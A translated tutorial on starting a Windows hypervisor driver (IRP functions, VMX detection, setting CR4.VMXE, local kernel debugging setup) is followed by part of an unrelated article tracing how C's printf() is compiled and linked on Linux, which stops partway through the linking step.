Hypervisor From Scratch – Part 2: Entering VMX Operation

Original text bySinaei )

Hi guys,

It’s the second part of a multiple series of a tutorial called “Hypervisor From Scratch”, First I highly recommend to read the first part (Basic Concepts & Configure Testing Environment) before reading this part, as it contains the basic knowledge you need to know in order to understand the rest of this tutorial.

In this section, we will learn about Detecting Hypervisor Support for our processor, then we simply config the basic stuff to Enable VMX and Entering VMX Operation and a lot more thing about Window Driver Kit (WDK).

Configuring Our IRP Major Functions

Beside our kernel-mode driver (“MyHypervisorDriver“), I created a user-mode application called “MyHypervisorApp“, first of all (The source code is available in my GitHub), I should encourage you to write most of your codes in user-mode rather than kernel-mode and that’s because you might not have handled exceptions so it leads to BSODs, or on the other hand, running less code in kernel-mode reduces the possibility of putting some nasty kernel-mode bugs.

If you remember from the previous part, we create some Windows Driver Kit codes, now we want to develop our project to support more IRP Major Functions.

IRP Major Functions are located in a conventional Windows table that is created for every device, once you register your device in Windows, you have to introduce these functions in which you handle these IRP Major Functions. That’s like every device has a table of its Major Functions and everytime a user-mode application calls any of these functions, Windows finds the corresponding function (if device driver supports that MJ Function) based on the device that requested by the user and calls it then pass an IRP pointer to the kernel driver.

Now its responsibility of device function to check the privileges or etc.

The following code creates the device :

12345678910111213 NTSTATUS NtStatus = STATUS_SUCCESS; UINT64 uiIndex = 0; PDEVICE_OBJECT pDeviceObject = NULL; UNICODE_STRING usDriverName, usDosDeviceName;  DbgPrint(«[*] DriverEntry Called.»);   RtlInitUnicodeString(&usDriverName, L»\\Device\\MyHypervisorDevice»); RtlInitUnicodeString(&usDosDeviceName, L»\\DosDevices\\MyHypervisorDevice»);  NtStatus = IoCreateDevice(pDriverObject, 0, &usDriverName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, FALSE, &pDeviceObject); NTSTATUS NtStatusSymLinkResult = IoCreateSymbolicLink(&usDosDeviceName, &usDriverName);

Note that our device name is “\Device\MyHypervisorDevice.

After that, we need to introduce our Major Functions for our device.

1234567891011121314151617 if (NtStatus == STATUS_SUCCESS && NtStatusSymLinkResult == STATUS_SUCCESS) { for (uiIndex = 0; uiIndex < IRP_MJ_MAXIMUM_FUNCTION; uiIndex++) pDriverObject->MajorFunction[uiIndex] = DrvUnsupported;  DbgPrint(«[*] Setting Devices major functions.»); pDriverObject->MajorFunction[IRP_MJ_CLOSE] = DrvClose; pDriverObject->MajorFunction[IRP_MJ_CREATE] = DrvCreate; pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DrvIOCTLDispatcher; pDriverObject->MajorFunction[IRP_MJ_READ] = DrvRead; pDriverObject->MajorFunction[IRP_MJ_WRITE] = DrvWrite;  pDriverObject->DriverUnload = DrvUnload; } else { DbgPrint(«[*] There was some errors in creating device.»); }

You can see that I put “DrvUnsupported” to all functions, this is a function to handle all MJ Functions and told the user that it’s not supported. The main body of this function is like this:

12345678910NTSTATUS DrvUnsupported(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){ DbgPrint(«[*] This function is not supported 🙁 !»);  Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; IoCompleteRequest(Irp, IO_NO_INCREMENT);  return STATUS_SUCCESS;}

We also introduce other major functions that are essential for our device, we’ll complete the implementation in the future, let’s just leave them alone.

12345678910111213141516171819202122232425262728293031323334353637383940414243NTSTATUS DrvCreate(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){ DbgPrint(«[*] Not implemented yet 🙁 !»);  Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; IoCompleteRequest(Irp, IO_NO_INCREMENT);  return STATUS_SUCCESS;} NTSTATUS DrvRead(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp){ DbgPrint(«[*] Not implemented yet 🙁 !»);  Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; IoCompleteRequest(Irp, IO_NO_INCREMENT);  return STATUS_SUCCESS;} NTSTATUS DrvWrite(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){ DbgPrint(«[*] Not implemented yet 🙁 !»);  Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; IoCompleteRequest(Irp, IO_NO_INCREMENT);  return STATUS_SUCCESS;} NTSTATUS DrvClose(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){ DbgPrint(«[*] Not implemented yet 🙁 !»);  Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; IoCompleteRequest(Irp, IO_NO_INCREMENT);  return STATUS_SUCCESS;}

Now let’s see IRP MJ Functions list and other types of Windows Driver Kit handlers routine.

IRP Major Functions List

This is a list of IRP Major Functions which we can use in order to perform different operations.

123456789101112131415161718192021222324252627282930#define IRP_MJ_CREATE                   0x00#define IRP_MJ_CREATE_NAMED_PIPE        0x01#define IRP_MJ_CLOSE                    0x02#define IRP_MJ_READ                     0x03#define IRP_MJ_WRITE                    0x04#define IRP_MJ_QUERY_INFORMATION        0x05#define IRP_MJ_SET_INFORMATION          0x06#define IRP_MJ_QUERY_EA                 0x07#define IRP_MJ_SET_EA                   0x08#define IRP_MJ_FLUSH_BUFFERS            0x09#define IRP_MJ_QUERY_VOLUME_INFORMATION 0x0a#define IRP_MJ_SET_VOLUME_INFORMATION   0x0b#define IRP_MJ_DIRECTORY_CONTROL        0x0c#define IRP_MJ_FILE_SYSTEM_CONTROL      0x0d#define IRP_MJ_DEVICE_CONTROL           0x0e#define IRP_MJ_INTERNAL_DEVICE_CONTROL  0x0f#define IRP_MJ_SHUTDOWN                 0x10#define IRP_MJ_LOCK_CONTROL             0x11#define IRP_MJ_CLEANUP                  0x12#define IRP_MJ_CREATE_MAILSLOT          0x13#define IRP_MJ_QUERY_SECURITY           0x14#define IRP_MJ_SET_SECURITY             0x15#define IRP_MJ_POWER                    0x16#define IRP_MJ_SYSTEM_CONTROL           0x17#define IRP_MJ_DEVICE_CHANGE            0x18#define IRP_MJ_QUERY_QUOTA              0x19#define IRP_MJ_SET_QUOTA                0x1a#define IRP_MJ_PNP                      0x1b#define IRP_MJ_PNP_POWER                IRP_MJ_PNP      // Obsolete….#define IRP_MJ_MAXIMUM_FUNCTION         0x1b

Every major function will only trigger if we call its corresponding function from user-mode. For instance, there is a function (in user-mode) called CreateFile (And all its variants like CreateFileA and CreateFileW for ASCII and Unicode) so everytime we call CreateFile the function that registered as IRP_MJ_CREATE will be called or if we call ReadFile then IRP_MJ_READ and WriteFile then IRP_MJ_WRITE  will be called. You can see that Windows treats its devices like files and everything we need to pass from user-mode to kernel-mode is available in PIRP Irp as a buffer when the function is called.

In this case, Windows is responsible to copy user-mode buffer to kernel mode stack.

Don’t worry we use it frequently in the rest of the project but we only support IRP_MJ_CREATE in this part and left others unimplemented for our future parts.

IRP Minor Functions

IRP Minor functions are mainly used for PnP manager to notify for a special event, for example,The PnP manager sends IRP_MN_START_DEVICE  after it has assigned hardware resources, if any, to the device or The PnP manager sends IRP_MN_STOP_DEVICE to stop a device so it can reconfigure the device’s hardware resources.

We will need these minor functions later in these series.

A list of IRP Minor Functions is available below:

1234567891011121314151617181920212223IRP_MN_START_DEVICEIRP_MN_QUERY_STOP_DEVICEIRP_MN_STOP_DEVICEIRP_MN_CANCEL_STOP_DEVICEIRP_MN_QUERY_REMOVE_DEVICEIRP_MN_REMOVE_DEVICEIRP_MN_CANCEL_REMOVE_DEVICEIRP_MN_SURPRISE_REMOVALIRP_MN_QUERY_CAPABILITIES IRP_MN_QUERY_PNP_DEVICE_STATEIRP_MN_FILTER_RESOURCE_REQUIREMENTSIRP_MN_DEVICE_USAGE_NOTIFICATIONIRP_MN_QUERY_DEVICE_RELATIONSIRP_MN_QUERY_RESOURCESIRP_MN_QUERY_RESOURCE_REQUIREMENTSIRP_MN_QUERY_IDIRP_MN_QUERY_DEVICE_TEXTIRP_MN_QUERY_BUS_INFORMATIONIRP_MN_QUERY_INTERFACEIRP_MN_READ_CONFIGIRP_MN_WRITE_CONFIGIRP_MN_DEVICE_ENUMERATEDIRP_MN_SET_LOCK

Fast I/O

For optimizing VMM, you can use Fast I/O which is a different way to initiate I/O operations that are faster than IRP. Fast I/O operations are always synchronous.

According to MSDN:

Fast I/O is specifically designed for rapid synchronous I/O on cached files. In fast I/O operations, data is transferred directly between user buffers and the system cache, bypassing the file system and the storage driver stack. (Storage drivers do not use fast I/O.) If all of the data to be read from a file is resident in the system cache when a fast I/O read or write request is received, the request is satisfied immediately. 

When the I/O Manager receives a request for synchronous file I/O (other than paging I/O), it invokes the fast I/O routine first. If the fast I/O routine returns TRUE, the operation was serviced by the fast I/O routine. If the fast I/O routine returns FALSE, the I/O Manager creates and sends an IRP instead.

The definition of Fast I/O Dispatch table is:

123456789101112131415161718192021222324252627282930typedef struct _FAST_IO_DISPATCH {  ULONG                                  SizeOfFastIoDispatch;  PFAST_IO_CHECK_IF_POSSIBLE             FastIoCheckIfPossible;  PFAST_IO_READ                          FastIoRead;  PFAST_IO_WRITE                         FastIoWrite;  PFAST_IO_QUERY_BASIC_INFO              FastIoQueryBasicInfo;  PFAST_IO_QUERY_STANDARD_INFO           FastIoQueryStandardInfo;  PFAST_IO_LOCK                          FastIoLock;  PFAST_IO_UNLOCK_SINGLE                 FastIoUnlockSingle;  PFAST_IO_UNLOCK_ALL                    FastIoUnlockAll;  PFAST_IO_UNLOCK_ALL_BY_KEY             FastIoUnlockAllByKey;  PFAST_IO_DEVICE_CONTROL                FastIoDeviceControl;  PFAST_IO_ACQUIRE_FILE                  AcquireFileForNtCreateSection;  PFAST_IO_RELEASE_FILE                  ReleaseFileForNtCreateSection;  PFAST_IO_DETACH_DEVICE                 FastIoDetachDevice;  PFAST_IO_QUERY_NETWORK_OPEN_INFO       FastIoQueryNetworkOpenInfo;  PFAST_IO_ACQUIRE_FOR_MOD_WRITE         AcquireForModWrite;  PFAST_IO_MDL_READ                      MdlRead;  PFAST_IO_MDL_READ_COMPLETE             MdlReadComplete;  PFAST_IO_PREPARE_MDL_WRITE             PrepareMdlWrite;  PFAST_IO_MDL_WRITE_COMPLETE            MdlWriteComplete;  PFAST_IO_READ_COMPRESSED               FastIoReadCompressed;  PFAST_IO_WRITE_COMPRESSED              FastIoWriteCompressed;  PFAST_IO_MDL_READ_COMPLETE_COMPRESSED  MdlReadCompleteCompressed;  PFAST_IO_MDL_WRITE_COMPLETE_COMPRESSED MdlWriteCompleteCompressed;  PFAST_IO_QUERY_OPEN                    FastIoQueryOpen;  PFAST_IO_RELEASE_FOR_MOD_WRITE         ReleaseForModWrite;  PFAST_IO_ACQUIRE_FOR_CCFLUSH           AcquireForCcFlush;  PFAST_IO_RELEASE_FOR_CCFLUSH           ReleaseForCcFlush;} FAST_IO_DISPATCH, *PFAST_IO_DISPATCH;

Defined Headers

I created the following headers (source.h) for my driver.

12345678910111213141516171819202122232425262728293031323334#pragma once#include <ntddk.h>#include <wdf.h>#include <wdm.h> extern void inline Breakpoint(void);extern void inline Enable_VMX_Operation(void);  NTSTATUS DriverEntry(PDRIVER_OBJECT  pDriverObject, PUNICODE_STRING  pRegistryPath);VOID DrvUnload(PDRIVER_OBJECT  DriverObject);NTSTATUS DrvCreate(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);NTSTATUS DrvRead(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);NTSTATUS DrvWrite(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);NTSTATUS DrvClose(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);NTSTATUS DrvUnsupported(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);NTSTATUS DrvIOCTLDispatcher(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp); VOID PrintChars(_In_reads_(CountChars) PCHAR BufferAddress, _In_ size_t CountChars);VOID PrintIrpInfo(PIRP Irp); #pragma alloc_text(INIT, DriverEntry)#pragma alloc_text(PAGE, DrvUnload)#pragma alloc_text(PAGE, DrvCreate)#pragma alloc_text(PAGE, DrvRead)#pragma alloc_text(PAGE, DrvWrite)#pragma alloc_text(PAGE, DrvClose)#pragma alloc_text(PAGE, DrvUnsupported)#pragma alloc_text(PAGE, DrvIOCTLDispatcher)   // IOCTL Codes and Its meanings#define IOCTL_TEST 0x1 // In case of testing

Now just compile your driver.

Loading Driver and Check the presence of Device

In order to load our driver (MyHypervisorDriver) first download OSR Driver Loader, then run Sysinternals DbgView as administrator make sure that your DbgView captures the kernel (you can check by going Capture -> Capture Kernel).

Enable Capturing Event

After that open the OSR Driver Loader (go to OsrLoader -> kit-> WNET -> AMD64 -> FRE) and open OSRLOADER.exe (in an x64 environment). Now if you built your driver, find .sys file (in MyHypervisorDriver\x64\Debug\ should be a file named: “MyHypervisorDriver.sys”), in OSR Driver Loader click to browse and select (MyHypervisorDriver.sys) and then click to “Register Service” after the message box that shows your driver registered successfully, you should click on “Start Service”.

Please note that you should have WDK installed for your Visual Studio in order to be able building your project.

Load Driver in OSR Driver Loader

Now come back to DbgView, then you should see that your driver loaded successfully and a message “[*] DriverEntry Called. ” should appear.

If there is no problem then you’re good to go, otherwise, if you have a problem with DbgView you can check the next step.

Keep in mind that now you registered your driver so you can use SysInternals WinObj in order to see whether “MyHypervisorDevice” is available or not.

WinObj

The Problem with DbgView

Unfortunately, for some unknown reasons, I’m not able to view the result of DbgPrint(), If you can see the result then you can skip this step but if you have a problem, then perform the following steps:

As I mentioned in part 1:

In regedit, add a key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Debug Print Filter

Under that , add a DWORD value named IHVDRIVER with a value of 0xFFFF

Reboot the machine and you’ll good to go.

It always works for me and I tested on many computers but my MacBook seems to have a problem.

In order to solve this problem, you need to find a Windows Kernel Global variable called, nt!Kd_DEFAULT_Mask, this variable is responsible for showing the results in DbgView, it has a mask that I’m not aware of so I just put a 0xffffffff in it to simply make it shows everything!

To do this, you need a Windows Local Kernel Debugging using Windbg.

  1. Open a Command Prompt window as Administrator. Enter bcdedit /debug on
  2. If the computer is not already configured as the target of a debug transport, enter bcdedit /dbgsettings local
  3. Reboot the computer.

After that you need to open Windbg with UAC Administrator privilege, go to File > Kernel Debug > Local > press OK and in you local Windbg find the nt!Kd_DEFAULT_Mask using the following command :

12prlkd> x nt!kd_Default_Maskfffff801`f5211808 nt!Kd_DEFAULT_Mask = <no type information>

Now change it value to 0xffffffff.

1lkd> eb fffff801`f5211808 ff ff ff ff
kd_DEFAULT_Mask

After that, you should see the results and now you’ll good to go.

Remember this is an essential step for the rest of the topic, because if we can’t see any kernel detail then we can’t debug.

DbgView

Detecting Hypervisor Support

Discovering support for vmx is the first thing that you should consider before enabling VT-x, this is covered in Intel Software Developer’s Manual volume 3C in section 23.6 DISCOVERING SUPPORT FOR VMX.

You could know the presence of VMX using CPUID if CPUID.1:ECX.VMX[bit 5] = 1, then VMX operation is supported.

First of all, we need to know if we’re running on an Intel-based processor or not, this can be understood by checking the CPUID instruction and find vendor string “GenuineIntel“.

The following function returns the vendor string form CPUID instruction.

12345678910111213141516171819202122232425262728293031323334353637string GetCpuID(){ //Initialize used variables char SysType[13]; //Array consisting of 13 single bytes/characters string CpuID; //The string that will be used to add all the characters to   //Starting coding in assembly language _asm { //Execute CPUID with EAX = 0 to get the CPU producer XOR EAX, EAX CPUID //MOV EBX to EAX and get the characters one by one by using shift out right bitwise operation. MOV EAX, EBX MOV SysType[0], al MOV SysType[1], ah SHR EAX, 16 MOV SysType[2], al MOV SysType[3], ah //Get the second part the same way but these values are stored in EDX MOV EAX, EDX MOV SysType[4], al MOV SysType[5], ah SHR EAX, 16 MOV SysType[6], al MOV SysType[7], ah //Get the third part MOV EAX, ECX MOV SysType[8], al MOV SysType[9], ah SHR EAX, 16 MOV SysType[10], al MOV SysType[11], ah MOV SysType[12], 00 } CpuID.assign(SysType, 12); return CpuID;}

The last step is checking for the presence of VMX, you can check it using the following code :

1234567891011121314151617181920bool VMX_Support_Detection(){  bool VMX = false; __asm { xor    eax, eax inc    eax cpuid bt     ecx, 0x5 jc     VMXSupport VMXNotSupport : jmp     NopInstr VMXSupport : mov    VMX, 0x1 NopInstr : nop }  return VMX;}

As you can see it checks CPUID with EAX=1 and if the 5th (6th) bit is 1 then the VMX Operation is supported. We can also perform the same thing in Kernel Driver.

All in all, our main code should be something like this:

123456789101112131415161718192021222324252627int main(){ string CpuID; CpuID = GetCpuID(); cout << «[*] The CPU Vendor is : » << CpuID << endl; if (CpuID == «GenuineIntel») { cout << «[*] The Processor virtualization technology is VT-x. \n»; } else { cout << «[*] This program is not designed to run in a non-VT-x environemnt !\n»; return 1; } if (VMX_Support_Detection()) { cout << «[*] VMX Operation is supported by your processor .\n»; } else { cout << «[*] VMX Operation is not supported by your processor .\n»; return 1; } _getch();    return 0;}

The final result:

User-mode app

Enabling VMX Operation

If our processor supports the VMX Operation then its time to enable it. As I told you above, IRP_MJ_CREATE is the first function that should be used to start the operation.

Form Intel Software Developer’s Manual (23.7 ENABLING AND ENTERING VMX OPERATION):

Before system software can enter VMX operation, it enables VMX by setting CR4.VMXE[bit 13] = 1. VMX operation is then entered by executing the VMXON instruction. VMXON causes an invalid-opcode exception (#UD) if executed with CR4.VMXE = 0. Once in VMX operation, it is not possible to clear CR4.VMXE. System software leaves VMX operation by executing the VMXOFF instruction. CR4.VMXE can be cleared outside of VMX operation after executing of VMXOFF.
VMXON is also controlled by the IA32_FEATURE_CONTROL MSR (MSR address 3AH). This MSR is cleared to zero when a logical processor is reset. The relevant bits of the MSR are:

  •  Bit 0 is the lock bit. If this bit is clear, VMXON causes a general-protection exception. If the lock bit is set, WRMSR to this MSR causes a general-protection exception; the MSR cannot be modified until a power-up reset condition. System BIOS can use this bit to provide a setup option for BIOS to disable support for VMX. To enable VMX support in a platform, BIOS must set bit 1, bit 2, or both, as well as the lock bit.
  •  Bit 1 enables VMXON in SMX operation. If this bit is clear, execution of VMXON in SMX operation causes a general-protection exception. Attempts to set this bit on logical processors that do not support both VMX operation and SMX operation cause general-protection exceptions.
  •  Bit 2 enables VMXON outside SMX operation. If this bit is clear, execution of VMXON outside SMX operation causes a general-protection exception. Attempts to set this bit on logical processors that do not support VMX operation cause general-protection exceptions.

Setting CR4 VMXE Bit

Do you remember the previous part where I told you how to create an inline assembly in Windows Driver Kit x64

Now you should create some function to perform this operation in assembly.

Just in Header File (in my case Source.h) declare your function:

1extern void inline Enable_VMX_Operation(void);

Then in assembly file (in my case SourceAsm.asm) add this function (Which set the 13th (14th) bit of Cr4).

1234567891011Enable_VMX_Operation PROC PUBLICpush rax ; Save the state xor rax,rax ; Clear the RAXmov rax,cr4or rax,02000h         ; Set the 14th bitmov cr4,rax pop rax ; Restore the stateretEnable_VMX_Operation ENDP

Also, declare your function in the above of SourceAsm.asm.

1PUBLIC Enable_VMX_Operation

The above function should be called in DrvCreate:

123456NTSTATUS DrvCreate(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){ Enable_VMX_Operation(); // Enabling VMX Operation DbgPrint(«[*] VMX Operation Enabled Successfully !»); return STATUS_SUCCESS;}

At last, you should call the following function from the user-mode:

123456789 HANDLE hWnd = CreateFile(L»\\\\.\\MyHypervisorDevice», GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, /// lpSecurityAttirbutes OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED, NULL); /// lpTemplateFile

If you see the following result, then you completed the second part successfully.

Final Show

Important Note: Please consider that your .asm file should have a different name from your driver main file (.c file) for example if your driver file is “Source.c” then using the name “Source.asm” causes weird linking errors in Visual Studio, you should change the name of you .asm file to something like “SourceAsm.asm” to avoid these kinds of linker errors.

Conclusion

In this part, you learned about basic stuff you to know in order to create a Windows Driver Kit program and then we entered to our virtual environment so we build a cornerstone for the rest of the parts.

In the third part, we’re getting deeper with Intel VT-x and make our driver even more advanced so wait, it’ll be ready soon!

The source code of this topic is available at :

[https://github.com/SinaKarvandi/Hypervisor-From-Scratch/]

References

[1] Intel® 64 and IA-32 architectures software developer’s manual combined volumes 3 (https://software.intel.com/en-us/articles/intel-sdm

[2] IRP_MJ_DEVICE_CONTROL (https://docs.microsoft.com/en-us/windows-hardware/drivers/kernel/irp-mj-device-control)

[3]  Windows Driver Kit Samples (https://github.com/Microsoft/Windows-driver-samples/blob/master/general/ioctl/wdm/sys/sioctl.c)

[4] Setting Up Local Kernel Debugging of a Single Computer Manually (https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/setting-up-local-kernel-debugging-of-a-single-computer-manually)

[5] Obtain processor manufacturer using CPUID (https://www.daniweb.com/programming/software-development/threads/112968/obtain-processor-manufacturer-using-cpuid)

[6] Plug and Play Minor IRPs (https://docs.microsoft.com/en-us/windows-hardware/drivers/kernel/plug-and-play-minor-irps)

[7] _FAST_IO_DISPATCH structure (https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/wdm/ns-wdm-_fast_io_dispatch)

[8] Filtering IRPs and Fast I/O (https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/filtering-irps-and-fast-i-o)

[9] Windows File System Filter Driver Development (https://www.apriorit.com/dev-blog/167-file-system-filter-driver)

Реклама

Tearing apart printf()

( Original text )

If ‘Hello World’ is the first program for C students, then printf() is probably the first function. I’ve had to answer questions about printf() many times over the years, so I’ve finally set aside time for an informal writeup. The common questions fit roughly in to two forms:

  • Easy: How does printf mechanically solve the format problem?
  • Complex: How does printf actually display text on my console?

My usual answer?
«Just open up stdio.h and track it down»

This wild goose chase is not only a great learning experience, but also an interesting test for the dedicated beginner. Will they come back with an answer? If so, how detailed is it? What IS a good answer?


printf() in 30 seconds — TL;DR edition

printf’s execution is tailored to your system and generally goes like this:

  1. Your application uses printf()
  2. Your compiler/linker produce a binary. printf is a load-time pointer to your C library
  3. Your C runtime fixes up the format and sends the string to the kernel via a generic write
  4. Your OS mediates the string’s access to its console representation via a device driver
  5. Text appears in your screen

…but you probably already knew all that.

This is the common case for user-space applications running on an off-the-shelf system. (Side-stepping virtual/embedded/distributed/real-mode machines for the moment).

A more complicated answer starts with: It depends — printf mechanics vary across long list of things: Your compiler toolchain, system architecture to include the operating system, and obviously how you’ve used it in your program. The diagram above is generally correct but precisely useless for any specific situation.

If you’re not impressed, that’s good. Let’s refine it.


printf() in 90 seconds — Interview question edition

  1. You include the <stdio.h> header in your application
  2. You use printf non-trivially in your app.
  3. Your compiler produces object code — printf is recognized, but unresolved
  4. The linker constructs the executable, printf is tagged for run-time resolution
  5. You execute your program. Standard library is mapped in the process address space
  6. A call to printf() jumps to library code
  7. The formatted string is resolved in a temporary buffer
  8. Standard library writes to the stdout buffered stream. Eventual kernel write entry
  9. Kernel calls a driver write operation for the associated console
  10. Console output buffer is updated with the new string
  11. Output text appears on your console

Sounds better? There’s still a lot missing, including any mention of system specifics. More things to think about (in no particular order):

  • Are we using static or dynamic linkage? Normally printf is run-time linked, but there are exceptions.
  • What OS is this? The differences between them are drastic — When/how is stdout managed? What is the console and how is it updated? What is the kernel entry/syscall procedure…
  • Closely related to the OS…what kind of executable is this? If ELF, we need to talk about the GOT / PLT. If PE (Windows), then we need an import directory.
  • What kind of terminal are you using? Standard laptop/desktop? University cluster over ssh? Is this a virtual machine?
  • This list could go on forever, and all answers affect what really happens behind the scenes.

Things to know before continuing

The next part is targeted for C beginners who want to explore how functions execute through a complex system. I’m keeping the discussion at a high-level so we can focus on how many parts of the problem contribute to a whole solution. I’ll provide references to source code and technical documents so readers can explore on their own. No blog substitutes for authoritative documentation.

Now for a more important question:
Why do beginners get stuck searching for a detailed answer about basic functions like printf()?

I’ll boil it down to three problems:

Not understanding the distinct roles of the compiler, standard library, operating system, and hardware. You can’t look at just one aspect of a system and expect to understand how a function like printf() works. Each component handles a part of the ‘printf’ problem and passes the work to the next using common interfaces along the way. C compilers try to adhere to the ISO C standards. Operating systems may also follow standards such as POSIX/SUS. Standardization streamlines interoperability and portability, but with the cost of code complexity. Beginners often struggle following the chain of code, especially when the standard requirements end and the ‘actual work’ begins between the interfaces. The common complaint: Too many seemingly useless function calls between the interface and the work. This is the price of interoperability and there’s no easy + maintainable + scalable way around it!

Not grasping [compile/link/load/run]-time dynamics. Manual static analysis has limits, and so following any function through the standard library source code inevitably leads to a dead end — an unresolved jump table, an opaque macro with multiple expansions, or a hard stop at the end: an ambiguous function pointer. In printf’s case, that would be *write, which the operating system promises will be exist at run-time. Modern compilers and OSs are designed to be multi-platform and thus every possible code path that could exist is visible prior to compilation. Beginners may get lost in a code base where much of the source ‘compiles away’ and functions resolve dynamically at execution. Trivial case: If you call printf() on a basic string without formats, your compiler may emit a call to ‘puts’, discarding your printf entirely!

Not enough exposure to common abstractions used in complex software systems. Tracing any function through the compiler and OS means working through many disparate ideas in computing. For instance, many I/O operations involve the idea of a character stream. Buffering character I/O with streams has been part of Unix System V since the early 1980s, thanks in part to Dennis Ritchie, co-author of ‘The C Programming Language’. Since the 1990s, multiprocessing has become the norm. Tracing printf means stepping around locks, mutexes, semaphores, and other synchronization tools. More recently, i18n has upped the ante for simple console output. All these concepts taken together often distract and overwhelm beginners who are simply trying to understand one core problem.

Bottom line: Compilers, libraries, operating systems, and hardware are complex; we need to understand how each works together as a system in order to truly understand how printf() works.


printf() in 1000 seconds — TMI edition

(or ‘Too-specific-to-apply-to-any-system-except-mine-on-the-day-I-wrote-this edition’)

The best way to answer these questions is to work through the details on an actual system.

$uname -a
Linux localhost.localdomain 3.10.0-693.el7.x86_64 #1 SMP Tue Aug 22 21:09:27 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

$gcc --version
gcc (GCC) 4.8.5 20150623 (Red Hat 4.8.5-16)
Copyright (C) 2015 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

$ldd --version
ldd (GNU libc) 2.17
Copyright (C) 2012 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

Key points:


Step 0 — What is printf?

printf() is an idea that the folks at Bell Labs believed in as early as 1972: A programmer should be able to produce output using various formats without understanding exactly what’s going on under the hood.

This idea is merely an interface.

The programmer calls printf and the system will handle the rest. That is why you’re presumably reading this article — hiding implementation details works!

Early compilers supported programmers exclusively through built-in functions. When toolchains became a business in the early 1980s (Manx/Aztec C, Lattice C), many provided C and ASM source code for common functions that developers could #include in their projects as needed. This allowed customization of built-ins at the application level — no more rebuilding your toolchain for each project. However, programmers were still at the mercy of various brands of compilers, each bringing their own vision of how to implement these functions and run-time.

Thankfully, most of this hassel has gone away today. So if you want to use printf…


Step 1 — Include the <stdio.h> header

Goal: Tap into the infinite power of the C standard library

The simple line of code #include <stdio.h> is possible across the vast majority of computer systems thanks to standards. Specifically, ISO-9899.

In 1978, Brian Kernighan and Dennis Ritchie described printf in its full variadic form to include nine types of formats:

printf(control, arg1, arg2, ...);    # K&R (1st ed.)

This was as close as the industry would get to a standard for the next decade. Between 1983 and 1989, the ANSI committee worked on the formal standard that eventually brought the printf interface to its familiar form:

int printf(const char *format, ...);   # ANSI C (1989)

Here’s an oft-forgotten bit of C trivia: printf returns a value (the actual character output count). The interface from 1978 didn’t mention a return value, but the implied return type is integer under K&R rules. The earliest known compiler (linked above) did not return any value.

The most recent C standard from 2011 shows that the interface changed by only one keyword in the intervening 20 years:

int printf(const char * restrict format, ...);  # Latest ISO C (2011)

‘restrict’ (a C99 feature) allows the compiler to optimize without concern for pointer aliasing.

Over the past 40 years, the interface for printf is mostly unchanged, thus highly backwards compatible. However, the feature set has grown quite a bit:

1972 1978 1989 2011
%d — decimal Top 3 from ’72 All from ’78 plus… Too many!
%o — octal %x — hexadecimal %i — signed int Read
%s — string %u — unsigned decimal %p — void pointer the
%p — string ptr %c — byte/character %n — output count manual
%e,f,g — floats/dbl %% — complete form pp. 309-315

Step 2 — Use printf() with formats

Goal: Make sure your call to printf actually uses printf()

We’ll test out printf() with two small plagarized programs. However, only one of them is truly a candidate to trace printf().

Trivial printf() — printf0.c Better printf() — printf1.c
$ cat printf0.c
#include <stdio.h>

int main(int argc, char **argv)
{
  printf("Hello World\n");
  return 0;
}     
$ cat printf1.c
#include <stdio.h>

int main(int argc, char **argv)
{
  printf("Hello World %d\n",1);
  return 0;
}

The difference is that printf0.c does not actually contain any formats, thus there is no reason to use printf. Your compiler won’t bother to use it. In fact, you can’t even disable this ‘optimization’ using GCC -O0 because the substitution (fold) happens during semantic analysis (GCC lingo: Gimplification), not during optimization. To see this in action, we must compile!

Possible trap: Some compilers may recognize the ‘1’ literal used in printf1.c, fold it in to the string, and avoid printf() in both cases. If that happens to you, substitute an expression that must be evaluated.


Step 3 — Compiler produces object code

Goal: Organize the components (symbols) of your application

Compiling programs results in an object file, which contains records of every symbol in the source file. Each .c file compiles to a .o file but none of seen any other files (no linking yet). Let’s look at the symbols in both of the programs from the last step.

Trivial printf() More useful printf()
$ gcc printf0.c -c -o printf0.o
$ nm printf0.o
0000000000000000 T main
                 U puts
$ gcc printf1.c -c -o printf1.o
$ nm printf1.o
0000000000000000 T main
                 U printf

As expected, the trivial printf usage has a symbol to a more simple function, puts. The file that included a format instead as a symbol for printf. In both cases, the symbol is undefined. The compiler doesn’t know where puts() or printf() are defined, but it knows that they exist thanks to stdio.h. It’s up to the linker to resolve the symbols.


Step 4 — Linking brings it all together

Goal: Build a binary that includes all code in one package

Let’s compile and linking both files again, this time both statically and dynamically.

$ gcc printf0.c -o printf0            # Trivial printf dynamic linking
